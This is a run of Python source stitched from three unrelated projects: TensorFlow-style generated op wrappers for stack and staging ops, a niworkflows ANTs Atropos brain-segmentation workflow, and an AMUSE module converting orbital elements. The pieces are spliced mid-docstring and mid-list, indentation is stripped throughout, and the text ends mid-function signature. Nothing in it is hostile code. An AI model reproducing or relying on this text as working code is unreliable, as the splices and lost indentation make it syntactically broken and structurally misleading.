_result, = _result
return _result
def stack_v2(max_size, elem_type, stack_name="", name=None):
r"""A stack that produces elements in first-in last-out order.
Args:
max_size: A `Tensor` of type `int32`.
The maximum size of the stack if non-negative. If negative, the stack
size is unlimited.
elem_type: A `tf.DType`. The type of the elements on the stack.
stack_name: An optional `string`. Defaults to `""`.
Overrides the name used for the temporary stack resource. Default
value is the name of the 'Stack' op (which is guaranteed unique).
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "StackV2", name,
tld.op_callbacks, max_size, "elem_type", elem_type, "stack_name",
stack_name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stack_v2_eager_fallback(
max_size, elem_type=elem_type, stack_name=stack_name, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
elem_type = _execute.make_type(elem_type, "elem_type")
if stack_name is None:
stack_name = ""
stack_name = _execute.make_str(stack_name, "stack_name")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"StackV2", max_size=max_size, elem_type=elem_type,
stack_name=stack_name, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("elem_type", _op._get_attr_type("elem_type"), "stack_name",
_op.get_attr("stack_name"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"StackV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
StackV2 = tf_export("raw_ops.StackV2")(_ops.to_raw_op(stack_v2))
def stack_v2_eager_fallback(max_size, elem_type, stack_name, name, ctx):
elem_type = _execute.make_type(elem_type, "elem_type")
if stack_name is None:
stack_name = ""
stack_name = _execute.make_str(stack_name, "stack_name")
max_size = _ops.convert_to_tensor(max_size, _dtypes.int32)
_inputs_flat = [max_size]
_attrs = ("elem_type", elem_type, "stack_name", stack_name)
_result = _execute.execute(b"StackV2", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"StackV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
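# Illustrative eager-mode usage of the stack ops defined above, through their
# exported `tf.raw_ops` endpoints (the dtype and values are arbitrary examples):
#
#     import tensorflow as tf
#     handle = tf.raw_ops.StackV2(max_size=10, elem_type=tf.float32)
#     tf.raw_ops.StackPushV2(handle=handle, elem=tf.constant(1.0))
#     tf.raw_ops.StackPopV2(handle=handle, elem_type=tf.float32)  # -> 1.0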
def stage(values, capacity=0, memory_limit=0, container="", shared_name="", name=None):
r"""Stage values similar to a lightweight Enqueue.
The basic functionality of this Op is similar to a queue with many
fewer capabilities and options. This Op is optimized for performance.
Args:
    values: A list of `Tensor` objects; a list of tensors whose data types
      the inserted values should adhere to.
capacity: An optional `int` that is `>= 0`. Defaults to `0`.
Maximum number of elements in the Staging Area. If > 0, inserts
on the container will block when the capacity is reached.
memory_limit: An optional `int` that is `>= 0`. Defaults to `0`.
The maximum number of bytes allowed for Tensors in the Staging Area.
If > 0, inserts will block until sufficient space is available.
container: An optional `string`. Defaults to `""`.
If non-empty, this queue is placed in the given container. Otherwise,
a default container is used.
shared_name: An optional `string`. Defaults to `""`.
It is necessary to match this name to the matching Unstage Op.
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx._context_handle, tld.device_name, "Stage", name,
tld.op_callbacks, values, "capacity", capacity, "memory_limit",
memory_limit, "container", container, "shared_name", shared_name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return stage_eager_fallback(
values, capacity=capacity, memory_limit=memory_limit,
container=container, shared_name=shared_name, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if capacity is None:
capacity = 0
capacity = _execute.make_int(capacity, "capacity")
if memory_limit is None:
memory_limit = 0
memory_limit = _execute.make_int(memory_limit, "memory_limit")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Stage", values=values, capacity=capacity, memory_limit=memory_limit,
container=container, shared_name=shared_name, name=name)
return _op
Stage = tf_export("raw_ops.Stage")(_ops.to_raw_op(stage))
def stage_eager_fallback(values, capacity, memory_limit, container, shared_name, name, ctx):
if capacity is None:
capacity = 0
capacity = _execute.make_int(capacity, "capacity")
if memory_limit is None:
memory_limit = 0
memory_limit = _execute.make_int(memory_limit, "memory_limit")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_attr_dtypes, values = _execute.convert_to_mixed_eager_tensors(values, ctx)
_inputs_flat = list(values)
_attrs = ("capacity", capacity, "memory_limit", memory_limit, "dtypes",
_attr_dtypes, "container", container, "shared_name", shared_name)
_result = _execute.execute(b"Stage", 0, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
_result = None
return _result
def stage_clear(dtypes, capacity=0, memory_limit=0, container="", shared_name="", name=None):
r"""Op removes all elements in the underlying container.
Args:
dtypes: A list of `tf.DTypes`.
capacity: An optional `int` that is `>= 0`. Defaults to `0`.
    memory_limit: An optional `int` that is `>= 0`. Defaults to `0`.
"reference_image")]),
(norm, map_wmmask, [
("reverse_transforms", "transforms"),
("reverse_invert_flags", "invert_transform_flags"),
]),
(map_wmmask, inu_n4_final, [("output_image", "weight_image")]),
])
# fmt: on
if use_laplacian:
lap_tmpl = pe.Node(
ImageMath(operation="Laplacian", op2="1.5 1", copy_header=True),
name="lap_tmpl",
)
lap_tmpl.inputs.op1 = tpl_target_path
lap_target = pe.Node(
ImageMath(operation="Laplacian", op2="1.5 1", copy_header=True),
name="lap_target",
)
mrg_tmpl = pe.Node(niu.Merge(2), name="mrg_tmpl")
mrg_tmpl.inputs.in1 = tpl_target_path
mrg_target = pe.Node(niu.Merge(2), name="mrg_target")
# fmt: off
wf.connect([
(inu_n4, lap_target, [(("output_image", _pop), "op1")]),
(lap_tmpl, mrg_tmpl, [("output_image", "in2")]),
(inu_n4, mrg_target, [("output_image", "in1")]),
(lap_target, mrg_target, [("output_image", "in2")]),
(mrg_tmpl, norm, [("out", "fixed_image")]),
(mrg_target, norm, [("out", "moving_image")]),
])
# fmt: on
else:
norm.inputs.fixed_image = tpl_target_path
# fmt: off
wf.connect([
(inu_n4, norm, [(("output_image", _pop), "moving_image")]),
])
# fmt: on
if atropos_refine:
atropos_model = atropos_model or list(ATROPOS_MODELS[bids_suffix].values())
atropos_wf = init_atropos_wf(
use_random_seed=atropos_use_random_seed,
omp_nthreads=omp_nthreads,
mem_gb=mem_gb,
in_segmentation_model=atropos_model,
bspline_fitting_distance=bspline_fitting_distance,
wm_prior=bool(wm_tpm),
)
# fmt: off
wf.disconnect([
(thr_brainmask, outputnode, [("output_image", "out_mask")]),
(inu_n4_final, outputnode, [("output_image", "bias_corrected"),
("bias_image", "bias_image")]),
(apply_mask, outputnode, [("out_file", "out_file")]),
])
wf.connect([
(inputnode, atropos_wf, [("in_files", "inputnode.in_files")]),
(inu_n4_final, atropos_wf, [("output_image", "inputnode.in_corrected")]),
(thr_brainmask, atropos_wf, [("output_image", "inputnode.in_mask")]),
(atropos_wf, outputnode, [
("outputnode.out_file", "out_file"),
("outputnode.bias_corrected", "bias_corrected"),
("outputnode.bias_image", "bias_image"),
("outputnode.out_mask", "out_mask"),
("outputnode.out_segm", "out_segm"),
("outputnode.out_tpms", "out_tpms"),
]),
])
# fmt: on
if wm_tpm:
# fmt: off
wf.connect([
(map_wmmask, atropos_wf, [("output_image", "inputnode.wm_prior")]),
])
# fmt: on
return wf
def init_atropos_wf(
name="atropos_wf",
use_random_seed=True,
omp_nthreads=None,
mem_gb=3.0,
padding=10,
in_segmentation_model=tuple(ATROPOS_MODELS["T1w"].values()),
bspline_fitting_distance=200,
wm_prior=False,
):
"""
Create an ANTs' ATROPOS workflow for brain tissue segmentation.
Re-interprets supersteps 6 and 7 of ``antsBrainExtraction.sh``,
which refine the mask previously computed with the spatial
normalization to the template.
The workflow also executes steps 8 and 9 of the brain extraction
workflow.
Workflow Graph
.. workflow::
:graph2use: orig
:simple_form: yes
from niworkflows.anat.ants import init_atropos_wf
wf = init_atropos_wf()
Parameters
----------
name : str, optional
Workflow name (default: "atropos_wf").
use_random_seed : bool
Whether ATROPOS should generate a random seed based on the
system's clock
omp_nthreads : int
Maximum number of threads an individual process may use
mem_gb : float
Estimated peak memory consumption of the most hungry nodes
in the workflow
padding : int
Pad images with zeros before processing
in_segmentation_model : tuple
A k-means segmentation is run to find gray or white matter
around the edge of the initial brain mask warped from the
template.
        This produces a segmentation image with :math:`K` classes,
        ordered by mean intensity in increasing order.
        With this option, you can control :math:`K` and tell the script which
classes represent CSF, gray and white matter.
Format (K, csfLabel, gmLabel, wmLabel).
Examples:
``(3,1,2,3)`` for T1 with K=3, CSF=1, GM=2, WM=3 (default),
``(3,3,2,1)`` for T2 with K=3, CSF=3, GM=2, WM=1,
``(3,1,3,2)`` for FLAIR with K=3, CSF=1 GM=3, WM=2,
``(4,4,2,3)`` uses K=4, CSF=4, GM=2, WM=3.
bspline_fitting_distance : float
The size of the b-spline mesh grid elements, in mm (default: 200)
wm_prior : :obj:`bool`
Whether the WM posterior obtained with ATROPOS should be regularized with a prior
map (typically, mapped from the template). When ``wm_prior`` is ``True`` the input
field ``wm_prior`` of the input node must be connected.
Inputs
------
in_files : list
The original anatomical images passed in to the brain-extraction workflow.
in_corrected : list
:abbr:`INU (intensity non-uniformity)`-corrected files.
in_mask : str
Brain mask calculated previously.
wm_prior : :obj:`str`
Path to the WM prior probability map, aligned with the individual data.
Outputs
-------
out_file : :obj:`str`
Path of the corrected and brain-extracted result, using the ATROPOS refinement.
bias_corrected : :obj:`str`
Path of the corrected and result, using the ATROPOS refinement.
bias_image : :obj:`str`
Path of the estimated INU bias field, using the ATROPOS refinement.
out_mask : str
Refined brain mask
out_segm : str
Output segmentation
out_tpms : str
Output :abbr:`TPMs (tissue probability maps)`
"""
wf = pe.Workflow(name)
out_fields = ["bias_corrected", "bias_image", "out_mask", "out_segm", "out_tpms"]
inputnode = pe.Node(
niu.IdentityInterface(
fields=["in_files", "in_corrected", "in_mask", "wm_prior"]
),
name="inputnode",
)
outputnode = pe.Node(
niu.IdentityInterface(fields=["out_file"] + out_fields), name="outputnode"
)
copy_xform = pe.Node(
CopyXForm(fields=out_fields), name="copy_xform", run_without_submitting=True
)
# Morphological dilation, radius=2
dil_brainmask = pe.Node(
ImageMath(operation="MD", op2="2", copy_header=True), name="dil_brainmask"
)
# Get largest connected component
get_brainmask = pe.Node(
ImageMath(operation="GetLargestComponent", copy_header=True),
name="get_brainmask",
)
# Run atropos (core node)
atropos = pe.Node(
Atropos(
convergence_threshold=0.0,
dimension=3,
initialization="KMeans",
likelihood_model="Gaussian",
mrf_radius=[1, 1, 1],
mrf_smoothing_factor=0.1,
n_iterations=3,
number_of_tissue_classes=in_segmentation_model[0],
save_posteriors=True,
use_random_seed=use_random_seed,
),
name="01_atropos",
n_procs=omp_nthreads,
mem_gb=mem_gb,
)
# massage outputs
pad_segm = pe.Node(
ImageMath(operation="PadImage", op2=f"{padding}", copy_header=False),
name="02_pad_segm",
)
pad_mask = pe.Node(
ImageMath(operation="PadImage", op2=f"{padding}", copy_header=False),
name="03_pad_mask",
)
# Split segmentation in binary masks
sel_labels = pe.Node(
niu.Function(
function=_select_labels, output_names=["out_wm", "out_gm", "out_csf"]
),
name="04_sel_labels",
)
sel_labels.inputs.labels = list(reversed(in_segmentation_model[1:]))
# Select largest components (GM, WM)
# ImageMath ${DIMENSION} ${EXTRACTION_WM} GetLargestComponent ${EXTRACTION_WM}
get_wm = pe.Node(ImageMath(operation="GetLargestComponent"), name="05_get_wm")
get_gm = pe.Node(ImageMath(operation="GetLargestComponent"), name="06_get_gm")
# Fill holes and calculate intersection
# ImageMath ${DIMENSION} ${EXTRACTION_TMP} FillHoles ${EXTRACTION_GM} 2
# MultiplyImages ${DIMENSION} ${EXTRACTION_GM} ${EXTRACTION_TMP} ${EXTRACTION_GM}
fill_gm = pe.Node(ImageMath(operation="FillHoles", op2="2"), name="07_fill_gm")
mult_gm = pe.Node(
MultiplyImages(dimension=3, output_product_image="08_mult_gm.nii.gz"),
name="08_mult_gm",
)
# MultiplyImages ${DIMENSION} ${EXTRACTION_WM} ${ATROPOS_WM_CLASS_LABEL} ${EXTRACTION_WM}
# ImageMath ${DIMENSION} ${EXTRACTION_TMP} ME ${EXTRACTION_CSF} 10
relabel_wm = pe.Node(
MultiplyImages(
dimension=3,
second_input=in_segmentation_model[-1],
output_product_image="09_relabel_wm.nii.gz",
),
name="09_relabel_wm",
)
me_csf = pe.Node(ImageMath(operation="ME", op2="10"), name="10_me_csf")
# ImageMath ${DIMENSION} ${EXTRACTION_GM} addtozero ${EXTRACTION_GM} ${EXTRACTION_TMP}
# MultiplyImages ${DIMENSION} ${EXTRACTION_GM} ${ATROPOS_GM_CLASS_LABEL} ${EXTRACTION_GM}
# ImageMath ${DIMENSION} ${EXTRACTION_SEGMENTATION} addtozero ${EXTRACTION_WM} ${EXTRACTION_GM}
add_gm = pe.Node(ImageMath(operation="addtozero"), name="11_add_gm")
relabel_gm = pe.Node(
MultiplyImages(
dimension=3,
second_input=in_segmentation_model[-2],
output_product_image="12_relabel_gm.nii.gz",
),
name="12_relabel_gm",
)
add_gm_wm = pe.Node(ImageMath(operation="addtozero"), name="13_add_gm_wm")
# Superstep 7
# Split segmentation in binary masks
sel_labels2 = pe.Node(
niu.Function(function=_select_labels, output_names=["out_gm", "out_wm"]),
name="14_sel_labels2",
)
sel_labels2.inputs.labels = in_segmentation_model[2:]
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} addtozero ${EXTRACTION_MASK} ${EXTRACTION_TMP}
add_7 = pe.Node(ImageMath(operation="addtozero"), name="15_add_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} ME ${EXTRACTION_MASK} 2
me_7 = pe.Node(ImageMath(operation="ME", op2="2"), name="16_me_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} GetLargestComponent ${EXTRACTION_MASK}
comp_7 = pe.Node(ImageMath(operation="GetLargestComponent"), name="17_comp_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} MD ${EXTRACTION_MASK} 4
md_7 = pe.Node(ImageMath(operation="MD", op2="4"), name="18_md_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} FillHoles ${EXTRACTION_MASK} 2
fill_7 = pe.Node(ImageMath(operation="FillHoles", op2="2"), name="19_fill_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} addtozero ${EXTRACTION_MASK} \
# ${EXTRACTION_MASK_PRIOR_WARPED}
add_7_2 = pe.Node(ImageMath(operation="addtozero"), name="20_add_7_2")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} MD ${EXTRACTION_MASK} 5
md_7_2 = pe.Node(ImageMath(operation="MD", op2="5"), name="21_md_7_2")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} ME ${EXTRACTION_MASK} 5
me_7_2 = pe.Node(ImageMath(operation="ME", op2="5"), name="22_me_7_2")
# De-pad
depad_mask = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="23_depad_mask"
)
depad_segm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="24_depad_segm"
)
depad_gm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="25_depad_gm"
)
depad_wm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="26_depad_wm"
)
depad_csf = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="27_depad_csf"
)
msk_conform = pe.Node(niu.Function(function=_conform_mask), name="msk_conform")
merge_tpms = pe.Node(niu.Merge(in_segmentation_model[0]), name="merge_tpms")
sel_wm = pe.Node(niu.Select(), name="sel_wm", run_without_submitting=True)
if not wm_prior:
sel_wm.inputs.index = in_segmentation_model[-1] - 1
copy_xform_wm = pe.Node(
CopyXForm(fields=["wm_map"]), name="copy_xform_wm", run_without_submitting=True
)
# Refine INU correction
inu_n4_final = pe.MapNode(
N4BiasFieldCorrection(
dimension=3,
save_bias=True,
copy_header=True,
n_iterations=[50] * 5,
convergence_threshold=1e-7,
shrink_factor=4,
bspline_fitting_distance=bspline_fitting_distance,
),
n_procs=omp_nthreads,
name="inu_n4_final",
iterfield=["input_image"],
)
try:
inu_n4_final.inputs.rescale_intensities = True
except ValueError:
warn(
"N4BiasFieldCorrection's --rescale-intensities option was added in ANTS 2.1.0 "
f"({inu_n4_final.interface.version} found.) Please consider upgrading.",
UserWarning,
)
# Apply mask
apply_mask = pe.MapNode(ApplyMask(), iterfield=["in_file"], name="apply_mask")
# fmt: off
wf.connect([
(inputnode, dil_brainmask, [("in_mask", "op1")]),
(inputnode, copy_xform, [(("in_files", _pop), "hdr_file")]),
(inputnode, copy_xform_wm, [(("in_files", _pop), "hdr_file")]),
(inputnode, pad_mask, [("in_mask", "op1")]),
(inputnode, atropos, [("in_corrected", "intensity_images")]),
(inputnode, inu_n4_final, [("in_files", "input_image")]),
(inputnode, msk_conform, [(("in_files", _pop), "in_reference")]),
(dil_brainmask, get_brainmask, [("output_image", "op1")]),
(get_brainmask, atropos, [("output_image", "mask_image")]),
(atropos, pad_segm, [("classified_image", "op1")]),
(pad_segm, sel_labels, [("output_image", "in_segm")]),
(sel_labels, get_wm, [("out_wm", "op1")]),
(sel_labels, get_gm, [("out_gm", "op1")]),
(get_gm, fill_gm, [("output_image", "op1")]),
(get_gm, mult_gm, [("output_image", "first_input")]),
(fill_gm, mult_gm, [("output_image", "second_input")]),
(get_wm, relabel_wm, [("output_image", "first_input")]),
(sel_labels, me_csf, [("out_csf", "op1")]),
(mult_gm, add_gm, [("output_product_image", "op1")]),
(me_csf, add_gm, [("output_image", "op2")]),
(add_gm, relabel_gm, [("output_image", "first_input")]),
(relabel_wm, add_gm_wm, [("output_product_image", "op1")]),
(relabel_gm, add_gm_wm, [("output_product_image", "op2")]),
(add_gm_wm, sel_labels2, [("output_image", "in_segm")]),
(sel_labels2, add_7, [("out_wm", "op1"), ("out_gm", "op2")]),
(add_7, me_7, [("output_image", "op1")]),
(me_7, comp_7, [("output_image", "op1")]),
(comp_7, md_7, [("output_image", "op1")]),
(md_7, fill_7, [("output_image", "op1")]),
(fill_7, add_7_2, [("output_image", "op1")]),
(pad_mask, add_7_2, [("output_image", "op2")]),
(add_7_2, md_7_2, [("output_image", "op1")]),
(md_7_2, me_7_2, [("output_image", "op1")]),
(me_7_2, depad_mask, [("output_image", "op1")]),
(add_gm_wm, depad_segm, [("output_image", "op1")]),
(relabel_wm, depad_wm, [("output_product_image", "op1")]),
(relabel_gm, depad_gm, [("output_product_image", "op1")]),
(sel_labels, depad_csf, [("out_csf", "op1")]),
(depad_csf, merge_tpms, [("output_image", "in1")]),
(depad_gm, merge_tpms, [("output_image", "in2")]),
(depad_wm, merge_tpms, [("output_image", "in3")]),
(depad_mask, msk_conform, [("output_image", "in_mask")]),
(msk_conform, copy_xform, [("out", "out_mask")]),
(depad_segm, copy_xform, [("output_image", "out_segm")]),
(merge_tpms, copy_xform, [("out", "out_tpms")]),
(atropos, sel_wm, [("posteriors", "inlist")]),
(sel_wm, copy_xform_wm, [("out", "wm_map")]),
(copy_xform_wm, inu_n4_final, [("wm_map", "weight_image")]),
(inu_n4_final, copy_xform, [("output_image", "bias_corrected"),
("bias_image", "bias_image")]),
(copy_xform, apply_mask, [("bias_corrected", "in_file"),
("out_mask", "in_mask")]),
(apply_mask, outputnode, [("out_file", "out_file")]),
(copy_xform, outputnode, [
("bias_corrected", "bias_corrected"),
("bias_image", "bias_image"),
("out_mask", "out_mask"),
# src/amuse/ext/orbital_elements.py
"""
orbital element conversion and utility functions
this module provides:
generate_binaries
orbital_elements
get_orbital_elements_from_binary
get_orbital_elements_from_binaries
get_orbital_elements_from_arrays
and the following deprecated functions (these assume angle inputs and
outputs given as plain floats to be in degrees):
new_binary_from_orbital_elements
orbital_elements_from_binary
orbital_elements_for_rel_posvel_arrays
"""
import numpy
import warnings
from amuse.units import units, constants, nbody_system
from amuse.units.trigo import cos, sin, arccos, arctan2
from amuse.datamodel import Particles, Particle
from amuse.units.quantities import to_quantity, VectorQuantity
def derive_G(unit_or_quantity):
unit=unit_or_quantity.unit
if(unit.base_system==constants.G.unit.base_system):
G=constants.G
elif(unit.base_system==nbody_system.G.unit.base_system):
G=nbody_system.G
else:
raise Exception("units not known, provide a G constant")
return G
def newton(f, x0, fprime=None, args=(), tol=1.48e-8, maxiter=50):
if fprime is None:
warnings.warn("provide fprime")
return x0
i = 0
x = x0
while (i < maxiter):
fv = f(x, *args)
dfv = fprime(x, *args)
if(dfv == 0):
return x0, -2
delta = -fv/dfv
if(abs(delta) < tol):
return x+delta, 0
x = x+delta
i = i+1
return x, -1
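# Illustrative sketch (not part of the original module): the simple newton()
# helper above can solve Kepler's equation E - e*sin(E) = M for the eccentric
# anomaly E, given a mean anomaly M and eccentricity e as plain floats.
def _example_solve_kepler(M=1.2, e=0.3):
    def kepler(E, M, e):
        return E - e*numpy.sin(E) - M
    def kepler_prime(E, M, e):
        return 1.0 - e*numpy.cos(E)
    E, err = newton(kepler, M, fprime=kepler_prime, args=(M, e))
    return E, err  # err == 0 signals convergence within tol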
def true_anomaly_from_eccentric_anomaly(E, e):
return 2*arctan2((1+e)**0.5*sin(E/2), (1-e)**0.5*cos(E/2))
def equal_length_array_or_scalar(
array, length=1, mode="continue"
):
"""
Returns 'array' if its length is equal to 'length'. If this is not the
case, returns an array of length 'length' with values equal to the first
    value of the array (or, if 'array' is a scalar, that value). If mode is
    "warn", issues a warning when this happens; if mode is "exception", raises
    an exception in this case.
"""
try:
array_length = len(array)
if array_length == length:
return array
else:
if mode == "warn":
warnings.warn("Length of array is not equal to %i. Using only\
the first value." % length)
try:
unit = array.unit
value = array[0].value_in(unit)
except:
unit = units.none
value = array[0]
array = VectorQuantity(
array=numpy.ones(length) * value,
unit=unit,
)
return array
elif mode == "exception":
raise Exception("Length of array is not equal to %i. This is\
not supported." % length)
except:
try:
unit = array.unit
value = array.value_in(unit)
except:
unit = units.none
value = array
array = VectorQuantity(
array=numpy.ones(length) * value,
unit=unit,
)
if mode == "warn":
warnings.warn("Using single value for all cases.")
return array
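# Illustrative sketch (not part of the original module): a scalar quantity is
# broadcast to a VectorQuantity of the requested length; this is how
# rel_posvel_arrays_from_orbital_elements() below normalizes its inputs.
def _example_equal_length_broadcast():
    masses = equal_length_array_or_scalar(1.0 | units.MSun, length=3)
    return len(masses)  # 3, with every entry equal to 1 MSun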
def center_of_mass_array(
vectors,
primary_mass,
secondary_mass,
):
"""
Returns array of center_of_mass vectors, where primaries are considered to
be at (0,0,0) and secondaries at 'vectors'.
"""
total_mass = (primary_mass + secondary_mass).reshape(
(len(primary_mass), 1)
)
center_of_mass_array = (
(
vectors
* secondary_mass.reshape(
(len(secondary_mass), 1)
)
)
/ total_mass
)
return center_of_mass_array
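# Illustrative sketch (not part of the original module): for equal masses the
# barycenter sits halfway along the relative position vector.
def _example_center_of_mass():
    rel_pos = numpy.array([[1.0, 0.0, 0.0]]) | units.AU
    m1 = numpy.array([1.0]) | units.MSun
    m2 = numpy.array([1.0]) | units.MSun
    return center_of_mass_array(rel_pos, m1, m2)  # [[0.5, 0.0, 0.0]] AU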
def orbital_period_to_semimajor_axis( T, M1, M2=None, G=None ):
if G is None:
G=derive_G(M1)
if M2 is None:
M2=0.*M1
mu = G * (M1 + M2)
semi_major_axis = ((T / (2*numpy.pi))**2 * mu)**(1./3.)
return semi_major_axis
def semimajor_axis_to_orbital_period( a, M1, M2=None, G=None ):
if G is None:
G=derive_G(M1)
if M2 is None:
M2=0.*M1
mu = G * (M1 + M2)
orbital_period = 2*numpy.pi*(a**3/mu)**0.5
return orbital_period
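# Illustrative sketch (not part of the original module): the two conversions
# above are inverses of each other; a 1 yr orbit around 1 MSun corresponds to
# a semi-major axis of roughly 1 AU (G is derived from the unit system of M1).
def _example_kepler_third_law():
    a = orbital_period_to_semimajor_axis(1.0 | units.yr, 1.0 | units.MSun)
    T = semimajor_axis_to_orbital_period(a, 1.0 | units.MSun)
    return a.value_in(units.AU), T.value_in(units.yr)  # ~1.0 and ~1.0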
def rel_posvel_arrays_from_orbital_elements(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=0 | units.rad,
true_anomaly=0 | units.rad,
inclination=0 | units.rad,
longitude_of_the_ascending_node=0 | units.rad,
argument_of_periapsis=0 | units.rad,
G=None
):
"""
Returns relative positions/velocities for secondaries orbiting primaries.
If primary_mass is a scalar, assumes the same primary for all secondaries.
"""
if G is None:
G=derive_G(primary_mass)
try:
number_of_secondaries = len(secondary_mass)
except:
number_of_secondaries = 1
# arrays need to be equal to number of secondaries, or have just one value
primary_mass = equal_length_array_or_scalar(
primary_mass, length=number_of_secondaries)
semi_major_axis = equal_length_array_or_scalar(
semi_major_axis, length=number_of_secondaries)
eccentricity = equal_length_array_or_scalar(
eccentricity, length=number_of_secondaries)
true_anomaly = equal_length_array_or_scalar(
true_anomaly, length=number_of_secondaries)
inclination = equal_length_array_or_scalar(
inclination, length=number_of_secondaries)
longitude_of_the_ascending_node = equal_length_array_or_scalar(
longitude_of_the_ascending_node, length=number_of_secondaries)
argument_of_periapsis = equal_length_array_or_scalar(
argument_of_periapsis, length=number_of_secondaries)
cos_true_anomaly = cos(true_anomaly)
sin_true_anomaly = sin(true_anomaly)
cos_inclination = cos(inclination)
sin_inclination = sin(inclination)
cos_arg_per = cos(argument_of_periapsis)
sin_arg_per = sin(argument_of_periapsis)
cos_long_asc_nodes = cos(longitude_of_the_ascending_node)
sin_long_asc_nodes = sin(longitude_of_the_ascending_node)
# alpha is a unit vector directed along the line of node
alphax = (
cos_long_asc_nodes*cos_arg_per
- sin_long_asc_nodes*sin_arg_per*cos_inclination
)
alphay = (
sin_long_asc_nodes*cos_arg_per
+ cos_long_asc_nodes*sin_arg_per*cos_inclination
)
alphaz = sin_arg_per*sin_inclination
alpha = numpy.array([alphax, alphay, alphaz])
# beta is a unit vector perpendicular to alpha and the orbital angular
# momentum vector
betax = (
- cos_long_asc_nodes*sin_arg_per
- sin_long_asc_nodes*cos_arg_per*cos_inclination
)
betay = (
- sin_long_asc_nodes*sin_arg_per
+ cos_long_asc_nodes*cos_arg_per*cos_inclination
)
betaz = cos_arg_per*sin_inclination
beta = numpy.array([betax, betay, betaz])
# Relative position and velocity
separation = ( # Compute the relative separation
semi_major_axis*(1.0 - eccentricity**2)
/ (1.0 + eccentricity*cos_true_anomaly)
)
position_vector = (
separation*cos_true_anomaly*alpha
+ separation*sin_true_anomaly*beta
).T
velocity_tilde = (
(
G*(primary_mass + secondary_mass)
/ (semi_major_axis*(1.0 - eccentricity**2))
)**0.5
) # Common factor
velocity_vector = (
-1.0 * velocity_tilde * sin_true_anomaly * alpha
+ velocity_tilde*(eccentricity + cos_true_anomaly)*beta
).T
return position_vector, velocity_vector
def generate_binaries(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=0 | units.rad,
true_anomaly=0 | units.rad,
inclination=0 | units.rad,
longitude_of_the_ascending_node=0 | units.rad,
argument_of_periapsis=0 | units.rad,
G=None
):
"""
returns two particlesets, which contain the primaries and the secondaries
in binary pairs.
"""
if G is None:
G=derive_G(primary_mass)
mass_unit = primary_mass.unit
try:
number_of_primaries = len(primary_mass)
except:
number_of_primaries = 1
primary_mass = numpy.array(
[primary_mass.value_in(mass_unit)]
) | mass_unit
try:
number_of_secondaries = len(secondary_mass)
except:
number_of_secondaries = 1
secondary_mass = numpy.array(
[secondary_mass.value_in(mass_unit)]
) | mass_unit
if number_of_primaries==1 and number_of_secondaries:
number_of_primaries = number_of_secondaries
primary_mass = primary_mass[0] * numpy.ones(number_of_secondaries)
# mass arrays need to be the same length
if number_of_secondaries != number_of_primaries:
raise Exception("The number of primaries is not the same as the number\
of secondaries, this is not supported.")
position_vector, velocity_vector = rel_posvel_arrays_from_orbital_elements(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=eccentricity,
true_anomaly=true_anomaly,
inclination=inclination,
longitude_of_the_ascending_node=longitude_of_the_ascending_node,
argument_of_periapsis=argument_of_periapsis,
G=G
)
primaries = Particles(number_of_primaries)
secondaries = Particles(number_of_secondaries)
primaries.mass = primary_mass
secondaries.mass = secondary_mass
centers_of_mass = center_of_mass_array(
position_vector, primary_mass, secondary_mass)
centers_of_mass_velocity = center_of_mass_array(
velocity_vector, primary_mass, secondary_mass)
primaries.position = - centers_of_mass
secondaries.position = position_vector - centers_of_mass
primaries.velocity = - centers_of_mass_velocity
secondaries.velocity = velocity_vector - centers_of_mass_velocity
return primaries, secondaries
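# Illustrative sketch (not part of the original module): generating a single
# Sun-Jupiter-like pair; the returned particle sets are positioned and moving
# relative to the pair's center of mass.
def _example_generate_binaries():
    primaries, secondaries = generate_binaries(
        1.0 | units.MSun, 1.0 | units.MJupiter, 5.2 | units.AU,
        eccentricity=0.048)
    return primaries[0].position, secondaries[0].position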
def new_binary_from_orbital_elements(
mass1,
mass2,
semimajor_axis,
eccentricity=0,
true_anomaly=0 | units.deg,
inclination=0 | units.deg,
